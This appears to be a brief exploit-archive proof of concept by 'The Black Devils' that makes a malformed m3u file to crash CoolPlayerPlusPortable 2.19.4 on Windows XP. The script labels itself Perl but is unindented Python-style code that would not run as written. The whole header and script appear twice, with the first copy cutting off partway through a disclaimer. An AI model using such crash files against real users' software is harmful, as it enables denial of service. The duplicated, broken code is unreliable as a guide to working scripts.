# Title : CoolPlayerPlusPortable 2.19.4 (m3u) crash poc
# Date: 2013-01-10
# Software http://coolplayer.sourceforge.net/
# Author: The Black Devils
# Tested on: Windows XP SP2
# Greeting To : r0073r / KedAns-Dz / All DZ Hackerz
#!/usr/bin/perl
file="Dz.m3u"
crash="\x41" * 100
try:
print "[*] Creating exploit file...\n"
writeFile = open (file, "w")
writeFile.write(crash)
writeFile.close()
print "[*] File successfully created!"
except:
print "[*] Error while creating file!"
#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------
//The information contained within this publication is
# Date: 2013-01-10
# Software http://coolplayer.sourceforge.net/
# Author: The Black Devils
# Tested on: Windows XP SP2
# Greeting To : r0073r / KedAns-Dz / All DZ Hackerz
#!/usr/bin/perl
file="Dz.m3u"
crash="\x41" * 100
try:
print "[*] Creating exploit file...\n"
writeFile = open (file, "w")
writeFile.write(crash)
writeFile.close()
print "[*] File successfully created!"
except:
print "[*] Error while creating file!"
#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information